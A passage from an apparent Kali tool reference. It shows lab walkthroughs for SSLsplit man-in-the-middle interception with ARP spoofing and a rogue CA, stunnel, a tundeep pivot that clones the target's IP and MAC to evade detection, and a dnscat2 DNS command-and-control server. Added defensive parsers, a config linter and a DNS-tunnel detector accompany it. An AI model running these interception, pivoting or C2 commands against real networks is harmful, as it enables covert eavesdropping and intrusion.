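    return len(data) >= 6 and data[0] == 0x16 and data[1] == 0x03 and data[5] == 0x01


_HTTP_REQUEST_LINE = re.compile(
    rb"^(GET|POST|PUT|HEAD|DELETE|OPTIONS|PATCH|CONNECT|TRACE) \S+ HTTP/1\.[01]\r\n")


def looks_like_http(data: bytes) -> bool:
    return _HTTP_REQUEST_LINE.match(data) is not None


def looks_like_socks5(data: bytes) -> bool:
    # RFC 1928 greeting: VER=0x05, NMETHODS, then exactly NMETHODS method bytes.
    return len(data) >= 3 and data[0] == 0x05 and data[1] >= 1 and len(data) == 2 + data[1]


# Probe order matters: the first match wins, like sslh's probe list.
PROBES = [
    ("ssh", looks_like_ssh),
    ("tls", looks_like_tls),
    ("http", looks_like_http),
    ("socks5", looks_like_socks5),
]


def classify(head: bytes, on_timeout: str = "ssh") -> str:
    """Map the first bytes of a connection to a backend name.

    An empty buffer models a client that sent nothing before the timeout.
    SSH clients wait for the server banner, so a silent client is most
    likely SSH; that is why sslh's --on-timeout target defaults to ssh.
    Anything unrecognised goes to the catch-all target (sslh's --anyprot).
    """
    if not head:
        return on_timeout
    for name, probe in PROBES:
        if probe(head):
            return name
    return "anyprot"


def peek_protocol(conn: socket.socket, timeout: float = 2.0) -> str:
    """Classify a live connection without consuming its bytes.

    MSG_PEEK leaves the data in the kernel buffer, so the whole stream can
    afterwards be relayed untouched to the chosen backend.
    """
    conn.settimeout(timeout)
    try:
        head = conn.recv(1024, socket.MSG_PEEK)
    except socket.timeout:
        head = b""
    return classify(head)


def demo_socketpair(payload: bytes) -> tuple:
    """Self-contained check: send payload over a socketpair, peek at it,
    then show the bytes are still there for the backend to read."""
    a, b = socket.socketpair()
    try:
        a.sendall(payload)
        proto = peek_protocol(b, timeout=1.0)
        remaining = b.recv(1024)
        return proto, remaining
    finally:
        a.close()
        b.close()


if __name__ == "__main__":
    for sample in (b"SSH-2.0-OpenSSH_9.8\r\n",
                   bytes.fromhex("160301012a0100"),
                   b"GET / HTTP/1.1\r\nHost: example.com\r\n\r\n"):
        print(classify(sample))
```

The same TLS probe is what makes the captures elsewhere on this page recognisable: a stream that opens with 0x16 0x03 is a TLS handshake, whatever port it runs on, which is also why port-based firewall rules alone cannot tell an SSH session on 443 from HTTPS.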
SSLsplit
A tool for man-in-the-middle attacks against SSL/TLS-encrypted network connections.
■ Usage
root@kali:~# sslsplit -h
Usage: sslsplit [-D] [-f conffile] [-o opt=val] [options...] [proxyspecs...]
-f conffile use conffile to load configuration from
-o opt=val override conffile option opt with value val
-c pemfile use CA cert (and key) from pemfile to sign forged certs
-k pemfile use CA key (and cert) from pemfile to sign forged certs
-C pemfile use CA chain from pemfile (intermediate and root CA certs)
-K pemfile use key from pemfile for leaf certs (default: generate)
-q crlurl use URL as CRL distribution point for all forged certs
-t certdir use cert+chain+key PEM files from certdir to target all sites
matching the common names (non-matching: -T or generate if CA)
-A pemfile use cert+chain+key PEM file as fallback leaf cert when none of
those given by -t match, instead of generating one on the fly
-w gendir write leaf key and only generated certificates to gendir
-W gendir write leaf key and all certificates to gendir
-O deny all OCSP requests on all proxyspecs
-P passthrough SSL connections if they cannot be split because of
client cert auth or no matching cert and no CA (default: drop)
-a pemfile use cert from pemfile when destination requests client certs
-b pemfile use key from pemfile when destination requests client certs
-g pemfile use DH group params from pemfile (default: keyfiles or auto)
-G curve use ECDH named curve (default: prime256v1)
-Z disable SSL/TLS compression on all connections
-r proto only support one of tls10 tls11 tls12 (default: all)
-R proto disable one of tls10 tls11 tls12 (default: none)
-s ciphers use the given OpenSSL cipher suite spec (default: ALL:-aNULL)
-x engine load OpenSSL engine with the given identifier
-e engine specify default NAT engine to use (default: netfilter)
-E list available NAT engines and exit
-u user drop privileges to user (default if run as root: nobody)
-m group when using -u, override group (default: primary group of user)
-j jaildir chroot() to jaildir (impacts sni proxyspecs, see manual page)
-p pidfile write pid to pidfile (default: no pid file)
-l logfile connect log: log one line summary per connection to logfile
-L logfile content log: full data to file or named pipe (excludes -S/-F)
-S logdir content log: full data to separate files in dir (excludes -L/-F)
-F pathspec content log: full data to sep files with % subst (excl. -L/-S):
%T - initial connection time as an ISO 8601 UTC timestamp
%d - destination host and port
%D - destination host
%p - destination port
%s - source host and port
%S - source host
%q - source port
%% - literal '%'
e.g. "/var/log/sslsplit/%T-%s-%d.log"
-X pcapfile pcap log: packets to pcapfile (excludes -Y/-y)
-Y pcapdir pcap log: packets to separate files in dir (excludes -X/-y)
-y pathspec pcap log: packets to sep files with % subst (excl. -X/-Y):
see option -F for pathspec format
-I if mirror packets to interface
-T addr mirror packets to target address (used with -I)
-M logfile log master keys to logfile in SSLKEYLOGFILE format
-d daemon mode: run in background, log error messages to syslog
-D debug mode: run in foreground, log debug messages on stderr
-V print version information and exit
-h print usage information and exit
■ Usage example
# Create a self-signed CA certificate
root@kali_1:~# openssl genrsa -out hello.key 4096
root@kali_1:~# openssl req -new -x509 -key hello.key -out hello.crt
# Install the CA certificate on the target host
root@kali_2:~# mv hello.crt /usr/share/ca-certificates/
root@kali_2:~# echo "hello.crt" >> /etc/ca-certificates.conf
root@kali_2:~# update-ca-certificates
# On the attacker host, redirect traffic destined for port 443 to port 8443
root@kali_1:~# iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-ports 8443
# Run ARP spoofing against the target host
root@kali_1:~# arpspoof -i eth0 -c both -t 192.168.11.4 192.168.11.1
root@kali_1:~# mkdir -p sslsplit/logs
# Listen on port 8443
root@kali_1:~# sslsplit -S ./sslsplit/logs/ -k hello.key -c hello.crt -P https 0.0.0.0 8443
# Send a POST request to an external site from the target host
root@kali_2:~# curl -X POST https://fakestoreapi.com/products -d "{ title: 'test product', price: 13.5 }"
# A connection log line is printed on the attacker host
root@kali_1:~# sslsplit -S ./sslsplit/logs/ -k hello.key -c hello.crt -P https 0.0.0.0 8443
https 192.168.11.4 35372 172.67.194.129 443 fakestoreapi.com POST /products 200 9 sni:fakestoreapi.com names:fakestoreapi.com/fakestoreapi.com/*.fakestoreapi.com sproto:TLSv1.3:TLS_AES_256_GCM_SHA384 dproto:TLSv1.3:TLS_AES_256_GCM_SHA384 origcrt:98D7CCC5E33363DA75FA4EC74081917AA8E66749 usedcrt:34B9AABC552C2B5CCAE613D6E33491F929CFBA17
# The POST data that was sent and the response are recorded in the log
root@kali_1:~# cat sslsplit/logs/20241118T062538Z-192.168.11.4,35372-172.67.194.129,443.log
POST /products HTTP/1.1
Host: fakestoreapi.com
User-Agent: curl/8.9.1
Accept: */*
Content-Length: 38
Content-Type: application/x-www-form-urlencoded
{ title: 'test product', price: 13.5 }HTTP/1.1 200 OK
Date: Mon, 18 Nov 2024 06:25:41 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 9
Connection: close
access-control-allow-origin: *
etag: W/"9-YMkvF/wJa2P/mVmfWcyTuUjssI8"
x-powered-by: Express
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0NJbGIIWpejWrU9rOodsrytxNNQpBCPhxQq9hXSMYYK2IOzB%2FZSPtxSmPNVyiCCwXOVorhgPNIYogSfUalhovk2ndQk396cXAcLbE6K0J9ubCNWxbJaj3NTfCwShGrje77wu"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e45e2788c2f2b84-LAX
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=128879&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=855&delivery_rate=22251&cwnd=32&unsent_bytes=0&cid=f2e40991cbf79b1d&ts=686&x=0"
{"id":21}
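The one-line connection summary above carries the two facts an assessment report needs: which client trusted the rogue CA (usedcrt differs from origcrt) and which hosts it talked to while decrypted. The following is an added example, not SSLsplit code: a parser for that summary format as it appears on this page, with a check that flags connections where the client accepted a forged leaf certificate. The first sample line is the one logged above; the other two are constructed with placeholder fingerprints, one of them as a control with identical fingerprints that the check must not flag.

```python
"""Parse SSLsplit connect-log lines and flag forged-certificate connections.

Added example, not SSLsplit code. The field order follows the one-line
connection summary shown on this page; the first sample line is taken from
the page, the other two are constructed with placeholder fingerprints.
"""
from dataclasses import dataclass, field


@dataclass
class ConnRecord:
    proto: str
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int
    host: str
    method: str
    path: str
    status: int
    size: int
    # trailing key:value tokens: sni, names, sproto, dproto, origcrt, usedcrt
    attrs: dict = field(default_factory=dict)


def parse_connect_log_line(line: str) -> ConnRecord:
    parts = line.split()
    if len(parts) < 10:
        raise ValueError(f"unexpected connect-log line: {line!r}")
    attrs = {}
    for token in parts[10:]:
        key, sep, value = token.partition(":")   # split at the first colon only
        if sep:
            attrs[key] = value
    return ConnRecord(parts[0], parts[1], int(parts[2]), parts[3], int(parts[4]),
                      parts[5], parts[6], parts[7], int(parts[8]), int(parts[9]), attrs)


def forged_leaf(rec: ConnRecord) -> bool:
    """True when the certificate presented to the client (usedcrt) differs
    from the origin server's certificate (origcrt): the client trusted the
    interceptor's CA and its traffic was decrypted in transit."""
    orig = rec.attrs.get("origcrt", "").upper()
    used = rec.attrs.get("usedcrt", "").upper()
    return bool(orig and used and orig != used)


def intercepted_by_client(lines) -> dict:
    """Per client IP: how many connections were decrypted and to which hosts.
    This is the list of endpoints that accepted the rogue CA and need
    remediation (remove the CA, rotate any credentials sent)."""
    report = {}
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        rec = parse_connect_log_line(line)
        if forged_leaf(rec):
            entry = report.setdefault(rec.src_ip, {"connections": 0, "hosts": set()})
            entry["connections"] += 1
            entry["hosts"].add(rec.host)
    return report


CONSTRUCTED_LOG = [
    # the line logged in the usage example on this page
    "https 192.168.11.4 35372 172.67.194.129 443 fakestoreapi.com POST /products 200 9 "
    "sni:fakestoreapi.com names:fakestoreapi.com/fakestoreapi.com/*.fakestoreapi.com "
    "sproto:TLSv1.3:TLS_AES_256_GCM_SHA384 dproto:TLSv1.3:TLS_AES_256_GCM_SHA384 "
    "origcrt:98D7CCC5E33363DA75FA4EC74081917AA8E66749 usedcrt:34B9AABC552C2B5CCAE613D6E33491F929CFBA17",
    # constructed: same client, a second host, placeholder fingerprints
    "https 192.168.11.4 35380 203.0.113.10 443 example.com GET / 200 1256 "
    "sni:example.com names:example.com sproto:TLSv1.2:ECDHE-RSA-AES128-GCM-SHA256 "
    "dproto:TLSv1.2:ECDHE-RSA-AES128-GCM-SHA256 "
    "origcrt:0000000000000000000000000000000000000001 usedcrt:0000000000000000000000000000000000000002",
    # constructed control: identical fingerprints, must not be flagged
    "https 192.168.11.7 40010 203.0.113.10 443 example.com GET / 200 1256 "
    "sni:example.com names:example.com sproto:TLSv1.3:TLS_AES_128_GCM_SHA256 "
    "dproto:TLSv1.3:TLS_AES_128_GCM_SHA256 "
    "origcrt:0000000000000000000000000000000000000001 usedcrt:0000000000000000000000000000000000000001",
]

if __name__ == "__main__":
    for client, info in intercepted_by_client(CONSTRUCTED_LOG).items():
        print(client, info["connections"], sorted(info["hosts"]))
```

From the client's side the same condition is visible as a leaf certificate whose fingerprint no longer matches the origin's; certificate pinning in the client, or comparing observed fingerprints against a known-good list from a trusted vantage point, is what turns it into a detection rather than an after-the-fact log entry.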
Stunnel
A proxy designed to add TLS encryption to existing clients and servers.
■ Usage
root@kali:~# stunnel -help
Global options:
chroot = directory to chroot stunnel process
compression = compression type
EGD = path to Entropy Gathering Daemon socket
engine = auto|engine_id
engineCtrl = cmd[:arg]
engineDefault = TASK_LIST
foreground = yes|quiet|no foreground mode (don't fork, log to stderr)
log = append|overwrite log file
output = file to append log messages
pid = pid file
RNDbytes = bytes to read from random seed files
RNDfile = path to file with random seed data
RNDoverwrite = yes|no overwrite seed datafiles with new random data
syslog = yes|no send logging messages to syslog
Service-level options:
accept = [host:]port accept connections on specified host:port
CAengine = engine-specific CA certificate identifier for 'verify' option
CApath = CA certificate directory for 'verify' option
CAfile = CA certificate file for 'verify' option
cert = certificate chain
checkEmail = peer certificate email address
checkHost = peer certificate host name pattern
checkIP = peer certificate IP address
ciphers = permitted ciphers for TLS 1.2 or older
ciphersuites = permitted ciphersuites for TLS 1.3
client = yes|no client mode (remote service uses TLS)
config = command[:parameter] to execute
connect = [host:]port to connect
CRLpath = CRL directory
CRLfile = CRL file
curves = ECDH curve names
debug = [facility].level (e.g. daemon.info)
delay = yes|no delay DNS lookup for 'connect' option
engineId = ID of engine to read the key from
engineNum = number of engine to read the key from
exec = file execute local inetd-type program
execArgs = arguments for 'exec' (including $0)
failover = rr|prio failover strategy
ident = username for IDENT (RFC 1413) checking
include = directory with configuration file snippets
key = certificate private key
libwrap = yes|no use /etc/hosts.allow and /etc/hosts.deny
local = IP address to be used as source for remote connections
logId = connection identifier type
OCSP = OCSP responder URL
OCSPaia = yes|no check the AIA responders from certificates
OCSPflag = OCSP responder flags
OCSPnonce = yes|no send and verify the OCSP nonce extension
OCSPrequire = yes|no require a conclusive OCSP response
options = TLS option to set/reset
protocol = protocol to negotiate before TLS initialization
currently supported: cifs, connect, imap,
nntp, pgsql, pop3, proxy, smtp, socks
protocolAuthentication = authentication type for protocol negotiations
protocolDomain = domain for protocol negotiations
protocolHeader = custom header for protocol negotiations
protocolHost = host:port for protocol negotiations
protocolPassword = password for protocol negotiations
protocolUsername = username for protocol negotiations
PSKidentity = identity for PSK authentication
PSKsecrets = secrets for PSK authentication
pty = yes|no allocate pseudo terminal for 'exec' option
redirect = [host:]port to redirect on authentication failures
renegotiation = yes|no support renegotiation
requireCert = yes|no require client certificate
reset = yes|no send TCP RST on error
retry = yes|no retry connect+exec section
securityLevel = set the security level
service = service name
setgid = groupname for setgid()
setuid = username for setuid()
sessionCacheSize = session cache size
sessionCacheTimeout = session cache timeout (in seconds)
sessionResume = yes|no enable session resumption
sessiond = [host:]port use sessiond at host:port
sni = primary_service:host_name for an SNI virtual service
socket = a|l|r:option=value[:value]
set an option on accept/local/remote socket
sslVersion = all|SSLv3|TLSv1|TLSv1.1|TLSv1.2|TLSv1.3 TLS version
sslVersionMax = all|SSLv3|TLSv1|TLSv1.1|TLSv1.2|TLSv1.3 TLS version
sslVersionMin = all|SSLv3|TLSv1|TLSv1.1|TLSv1.2|TLSv1.3 TLS version
stack = thread stack size (in bytes)
ticketKeySecret = secret key for encryption/decryption TLSv1.3 tickets
ticketMacSecret = key for HMAC operations on TLSv1.3 tickets
TIMEOUTbusy = seconds to wait for expected data
TIMEOUTclose = seconds to wait for close_notify
TIMEOUTconnect = seconds to connect remote host
TIMEOUTidle = seconds to keep an idle connection
TIMEOUTocsp = seconds to connect OCSP responder
transparent = none|source|destination|both transparent proxy mode
verify = level of peer certificate verification
verifyChain = yes|no verify certificate chain
verifyPeer = yes|no verify peer certificate
■ Usage example
# Create the certificate chain on host 1
root@kali_1:~# openssl req -new -x509 -nodes -out stunnel.pem -keyout stunnel.pem
# Create the server configuration file
root@kali_1:~# cat > stunnel.conf << EOF
[sshd]
accept = 443
connect = 8443
cert = /root/stunnel.pem
EOF
# Start stunnel
root@kali_1:~# stunnel stunnel.conf
[...]
stunnel: LOG5[ui]: Configuration successful
# Start netcat (listening on port 8443)
root@kali_1:~# nc -l 8443
# Create the client configuration file on host 2
root@kali_2:~# cat > stunnel.conf << EOF
[ssh]
client = yes
accept = 8443
connect = 192.168.11.3:443
EOF
# Start stunnel
root@kali_2:~# stunnel stunnel.conf
# Connect to port 443 on host 1 via stunnel
root@kali_2:~# nc 127.0.0.1 8443
# When sent directly to port 8443 on host 1, the data stays in plaintext
root@kali_2:~# tcpdump -A -n -i eth1
11:30:56.840347 IP 192.168.11.4.58524 > 192.168.11.3.8443: Flags [P.], seq 2742508650:2742508656, ack 1820829686, win 502, options [nop,nop,TS val 1528148926 ecr 3443621137], length 6
E..:..@.@............. ..w\jl.......XV.....
[....A}.hello
# When sent to port 443 on host 1 via stunnel, the data is encrypted
root@kali_2:~# tcpdump -A -n -i eth1
11:30:08.583128 IP 192.168.11.4.50592 > 192.168.11.3.443: Flags [P.], seq 1944411150:1944411178, ack 1442874660, win 501, options [nop,nop,TS val 1528100666 ecr 3443517308], length 28
E..P..@.@...............s.\.V..$....Xl.....
[..:.?.|..........I.........&....;.^
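The client configuration above encrypts the link but never verifies who is on the other end: with no verifyChain/verifyPeer, CAfile or checkHost, host 2's stunnel accepts any certificate, so the tunnel defeats the passive sniffer in the capture but not an active man-in-the-middle. The following is an added example, not part of stunnel: a small linter that parses stunnel.conf and reports client-mode sections that skip verification, run over the page's own client config and a constructed hardened variant. The CAfile path and checkHost value in the hardened config are placeholders for host 1's CA certificate and certificate name.

```python
"""Lint stunnel client sections for missing server-certificate verification.

Added example, not part of stunnel. A [service] with client = yes that sets
neither verifyChain/verifyPeer nor a verify level backed by a CA source
accepts whatever certificate the far end presents. The weak config is the
client config from this page; the hardened one is constructed, and its
CAfile path and checkHost value are placeholders.
"""
import configparser

GLOBAL = "__global__"  # synthetic section for options before the first [service]


def parse_stunnel_conf(text: str) -> dict:
    """stunnel.conf is INI-like; return {service: {option_lowercase: value}}."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(f"[{GLOBAL}]\n" + text)
    return {section: {k.lower(): v.strip() for k, v in cp.items(section)}
            for section in cp.sections()}


def _yes(value: str) -> bool:
    return value.strip().lower() == "yes"


def lint_client_sections(text: str) -> dict:
    """Return {service: [issues]} for every client-mode service section."""
    findings = {}
    for service, opts in parse_stunnel_conf(text).items():
        if service == GLOBAL or not _yes(opts.get("client", "no")):
            continue  # server-side sections need a different checklist
        try:
            verify_level = int(opts.get("verify", "0"))
        except ValueError:
            verify_level = 0
        verifies = (_yes(opts.get("verifychain", "no"))
                    or _yes(opts.get("verifypeer", "no"))
                    or verify_level >= 2)
        has_ca = any(k in opts for k in ("cafile", "capath", "caengine"))
        issues = []
        if not verifies:
            issues.append("server certificate is not verified (set verifyChain = yes)")
        elif not has_ca:
            issues.append("verification enabled but no CAfile/CApath to verify against")
        if not any(k in opts for k in ("checkhost", "checkip")):
            issues.append("no checkHost/checkIP: any certificate the CA issued is accepted")
        if opts.get("sslversionmin", "").lower() in ("sslv3", "tlsv1", "tlsv1.1"):
            issues.append(f"weak sslVersionMin = {opts['sslversionmin']}")
        findings[service] = issues
    return findings


# the client configuration from this page (host 2)
PAGE_CLIENT_CONF = """
[ssh]
client = yes
accept = 8443
connect = 192.168.11.3:443
"""

# constructed hardened variant; paths and names are placeholders
HARDENED_CLIENT_CONF = """
[ssh]
client = yes
accept = 8443
connect = 192.168.11.3:443
verifyChain = yes
; placeholder: the CA (or self-signed cert) that issued host 1's stunnel.pem
CAfile = /etc/stunnel/host1-ca.pem
; placeholder: the CN/SAN in host 1's certificate
checkHost = kali_1
sslVersionMin = TLSv1.2
"""

if __name__ == "__main__":
    print("page config:    ", lint_client_sections(PAGE_CLIENT_CONF))
    print("hardened config:", lint_client_sections(HARDENED_CLIENT_CONF))
```

Since the server side on this page uses a self-signed stunnel.pem, the CAfile on the client can simply be that certificate; the point is that the client must have something to compare against, and checkHost ties the accepted certificate to the host it expects rather than to anything the CA ever signed.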
tundeep
A network tunneling tool that supports layer-2 Ethernet protocols.
■ Usage
root@kali:~# tundeep --help
Usage: tundeep <-i iface|[-t|-T] tapiface> <-h ip> <-p port> [-6] [-C] <-c|-s> [-x tapip] [-y tapmask] [-u tapmac] [-b bpf] [-d udp mode] [-e udp remote] [-K]
-6 IPv6 mode
-C compress mode
-K disable checksum
-a print all pcap devs
-b "bpf"
-i interface to bind to
-h IP to bind to/connect to
-p port to bind to/connect to
-c client mode
-s server mode
-d udp mode
-e udp peer
-t tap interface
-T ipv6 tap interface
-u tap mac
-x if -t mode, set iface ip, if -T mode, set iface ipv6 ip
-y if -t mode, set iface mask, if -T mode, set iface ipv6 prefixlen
■ Usage example
# Interfaces on the target host
root@kali_2:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.56.3 netmask 255.255.255.0 broadcast 192.168.56.255
ether 02:42:ac:13:00:03 txqueuelen 0 (Ethernet)
eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.11.4 netmask 255.255.255.0 broadcast 192.168.11.255
ether 00:15:5d:5f:c9:5d txqueuelen 0 (Ethernet)
# On the attacker host, start tundeep on port 5000, specifying the IP and MAC address of the target host's eth1
root@kali_1:~# tundeep -s -t tap0 -h 0.0.0.0 -p 5000 -x 192.168.11.4 -y 255.255.255.0 -u 00:15:5d:5f:c9:5d
# A tap0 interface is added on the attacker host
root@kali_1:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.56.2 netmask 255.255.255.0 broadcast 192.168.56.255
ether 02:42:ac:13:00:02 txqueuelen 0 (Ethernet)
tap0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.11.4 netmask 255.255.255.0 broadcast 192.168.11.255
ether 00:15:5d:5f:c9:5d txqueuelen 1000 (Ethernet)
# On the target host, start tundeep pointing at the attacker host (192.168.56.2); traffic received on eth1 is tunneled to the attacker host
root@kali_2:~# tundeep -i eth1 -h 192.168.56.2 -p 5000 -c
# Run an ARP scan from the attacker host against the target host's internal network
root@kali_1:~# arp-scan --interface tap0 --localnet
Interface: tap0, type: EN10MB, MAC: 00:15:5d:5f:c9:5d, IPv4: 192.168.11.4
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.11.1 d4:2c:46:be:0f:60 BUFFALO.INC
192.168.11.2 dc:fb:48:75:75:0b Intel Corporate
192.168.11.3 dc:a2:66:20:35:65 Hon Hai Precision Ind. Co.,Ltd.
# Because tap0 uses the target host's IP and MAC address, no new host appears on the target network (it is hard to detect)
# However, this can disrupt the target host's own traffic; to avoid that, give tap0 its own IP and MAC (a new IP/MAC then appears on the target network)
root@kali_3:~# arp -n
Address HWtype HWaddress Flags Mask Iface
192.168.11.1 ether d4:2c:46:be:0f:60 C eth0
192.168.11.2 ether dc:fb:48:75:75:0b C eth0
192.168.11.4 ether 00:15:5d:5f:c9:5d C eth1
Command and Control (C2) Framework
dnscat2
Creates an encrypted command-and-control channel over the DNS protocol.
■ Usage
# Server
root@kali:~# dnscat2-server --help
Default host (0.0.0.0) and port (53), with no specific domain:
# ruby dnscat2.rb
Default host/port, with a particular domain to listen on:
# ruby dnscat2.rb domain.com
Or multiple domains:
# ruby dnscat2.rb a.com b.com c.com
If you need to change the address or port it's listening on, that
can be done by passing the --dns argument:
# ruby dnscat2.rb --dns 'host=127.0.0.1,port=53531,domain=a.com,domain=b.com'
For other options, see below!
--h, -h: Placeholder for help
--version, -v: Get the dnscat version
--dns, -d <s>: Start a DNS server. Can optionally pass a number of
comma-separated name=value pairs (host, port,
domain). Eg, '--dns
host=0.0.0.0,port=53531,domain=skullseclabs.org' -
'domain' can be passed multiple times
--dnshost, -n <s>: The DNS ip address to listen on [deprecated]
(default: 0.0.0.0)
--dnsport, -s <i>: The DNS port to listen on [deprecated] (default:
53)
--passthrough, -p <s>: Unhandled requests are sent upstream DNS server,
host:port (default: )
--security, -e <s>: Set the security level; 'open' lets the client
choose; 'encrypted' requires encryption (default if
--secret isn't set); 'authenticated' requires
encryption and authentication (default if --secret
is set)
--secret, -c <s>: A pre-shared secret, passed to both the client and
server to prevent man-in-the-middle attacks
--auto-command, -a <s>: Send this to each client that connects (default: )
--auto-attach, -u: Automatically attach to new sessions
--packet-trace, -k: Display incoming/outgoing dnscat packets
--process, -r <s>: If set, the given process is run for every incoming
console/exec session and given stdin/stdout. This
has security implications.
--history-size, -i <i>: The number of lines of history that windows will
maintain (default: 1000)
--listener, -l <i>: DEBUG: Start a listener driver on the given port
--firehose, -f: If set, all output goes to stdout instead of being
put in windows.
--help: Show this message
# Client
root@kali:~# dnscat --help
Usage: dnscat [args] [domain]
General options:
--help -h This page.
--version Get the version.
--delay <ms> Set the maximum delay between packets (default: 1000).
The minimum is technically 50 for technical reasons,
but transmitting too quickly might make performance
worse.
--steady If set, always wait for the delay before sending.
the next message (by default, when a response is
received, the next message is immediately transmitted.
--max-retransmits <n> Only re-transmit a message <n> times before giving up
and assuming the server is dead (default: 20).
--retransmit-forever Set if you want the client to re-transmit forever
until a server turns up. This can be helpful, but also
makes the server potentially run forever.
--secret Set the shared secret; set the same one on the server
and the client to prevent man-in-the-middle attacks!
--no-encryption Turn off encryption/authentication.
Input options:
--console Send/receive output to the console.
--exec -e <process> Execute the given process and link it to the stream.
--command Start an interactive 'command' session (default).
--ping Simply check if there's a dnscat2 server listening.
Debug options:
-d Display more debug info (can be used multiple times).
-q Display less debug info (can be used multiple times).
--packet-trace Display incoming/outgoing dnscat2 packets
Driver options:
--dns <options> Enable DNS mode with the given domain.
domain=<domain> The domain to make requests for.
host=<hostname> The host to listen on (default: 0.0.0.0).
port=<port> The port to listen on (default: 53).
type=<type> The type of DNS requests to use, can use
multiple comma-separated (options: TXT, MX,
CNAME, A, AAAA) (default: TXT,CNAME,MX).
server=<server> The upstream server for making DNS requests
(default: autodetected = 127.0.0.11).
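The client help above names the three record types dnscat2 rides on by default (TXT, CNAME, MX), and the query names it generates are long, high-entropy labels that never repeat. The following is an added example, not part of dnscat2: heuristics that score DNS query lines from `tcpdump -n port 53` on exactly those properties and summarise them per source host. The first sample line is the tcpdump line from the usage example below; the rest are constructed, and the thresholds are assumptions for this demo that should be tuned against real resolver logs.

```python
"""Heuristics for spotting dnscat2-style tunnelling in 'tcpdump -n port 53' output.

Added example, not part of dnscat2. Thresholds are assumptions chosen for
this demo; tune them against your own resolver logs.
"""
import math
import re
from collections import Counter, defaultdict

# One DNS query line as printed by tcpdump -n (flags such as "+", "%" or
# "[1au]" may follow the transaction id).
QUERY_RE = re.compile(
    r"^(?P<ts>\S+) IP (?P<src>\d+(?:\.\d+){3})\.\d+ > (?P<dst>\d+(?:\.\d+){3})\.53: "
    r"\d+\S*(?: \[[^\]]*\])? (?P<qtype>[A-Z]+)\? (?P<qname>\S+) \((?P<len>\d+)\)$"
)

TUNNEL_QTYPES = {"TXT", "CNAME", "MX", "NULL"}  # dnscat2 defaults to TXT,CNAME,MX
LONG_LABEL = 30      # ordinary hostnames rarely approach the 63-byte label limit
HIGH_ENTROPY = 3.0   # bits per character; hex-encoded payload sits near 4.0


def shannon_entropy(text: str) -> float:
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def parse_query(line: str):
    """Return the query fields as a dict, or None for lines that are not queries."""
    m = QUERY_RE.match(line.strip())
    return m.groupdict() if m else None


def tunnel_indicators(query: dict) -> list:
    """List the reasons a single query looks like tunnel traffic."""
    labels = [lbl for lbl in query["qname"].rstrip(".").split(".") if lbl]
    longest = max(labels, key=len) if labels else ""
    reasons = []
    if query["qtype"] in TUNNEL_QTYPES:
        reasons.append(f"qtype {query['qtype']}")
    if len(longest) >= LONG_LABEL:
        reasons.append(f"label length {len(longest)}")
    if shannon_entropy(longest) >= HIGH_ENTROPY:
        reasons.append(f"entropy {shannon_entropy(longest):.2f}")
    return reasons


def summarize(lines) -> dict:
    """Per source IP: total queries, queries with >= 2 indicators, distinct names.

    A source whose suspicious count tracks its total and whose names never
    repeat looks like a tunnel; a chatty but legitimate client repeats names.
    """
    per_src = defaultdict(lambda: {"queries": 0, "suspicious": 0, "names": set()})
    for line in lines:
        q = parse_query(line)
        if q is None:
            continue
        entry = per_src[q["src"]]
        entry["queries"] += 1
        entry["names"].add(q["qname"])
        if len(tunnel_indicators(q)) >= 2:
            entry["suspicious"] += 1
    return {src: {"queries": e["queries"], "suspicious": e["suspicious"],
                  "unique_qnames": len(e["names"])} for src, e in per_src.items()}


CONSTRUCTED_CAPTURE = [
    # the query line shown in the usage example on this page
    "03:41:53.195196 IP 192.168.11.4.44093 > 192.168.11.3.53: 43573+ TXT? dnscat.2f3a016f52dd8c94e98fe70036e2f64773. (59)",
    # constructed continuation of the same session (CNAME and MX carriers)
    "03:41:54.201010 IP 192.168.11.4.44093 > 192.168.11.3.53: 43574+ CNAME? dnscat.6d1e9b0c4a7f2e8d3c5b1a9f0e7d6c4b2a. (61)",
    "03:41:55.207331 IP 192.168.11.4.44093 > 192.168.11.3.53: 43575+ MX? dnscat.0a9b8c7d6e5f4a3b2c1d0e9f8a7b6c5d4e. (58)",
    # constructed ordinary lookups from another host
    "03:41:56.000001 IP 192.168.11.5.51000 > 192.168.11.3.53: 1+ A? www.example.com. (33)",
    "03:41:57.000002 IP 192.168.11.5.51001 > 192.168.11.3.53: 2+ AAAA? kali.org. (26)",
]

if __name__ == "__main__":
    for src, stats in summarize(CONSTRUCTED_CAPTURE).items():
        print(src, stats)
```

The per-source summary is the useful unit: a single long TXT query is unremarkable (SPF and DKIM lookups look like that), but a host whose every query is a fresh high-entropy name under one domain, at a steady cadence, is the pattern worth alerting on, and in the direct-to-server mode used in the example below the resolver bypass itself (UDP/53 to an arbitrary host instead of the corporate resolver) is the simpler signal.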
■ Usage example
# Host 1
# Start the server
root@kali_1:~# dnscat2-server --dns 'host=0.0.0.0,port=53,domain=example.com'
New window created: 0
New window created: crypto-debug
dnscat2> Welcome to dnscat2! Some documentation may be out of date.
auto_attach => false
history_size (for new windows) => 1000
Security policy changed: All connections must be encrypted
New window created: dns1
Starting Dnscat2 DNS server on 0.0.0.0:53
[domains = example.com]...
Assuming you have an authoritative DNS server, you can run
the client anywhere with the following (--secret is optional):
./dnscat --secret=1507062e60429a952e6fe2aa94075363 example.com
To talk directly to the server without a domain name, run:
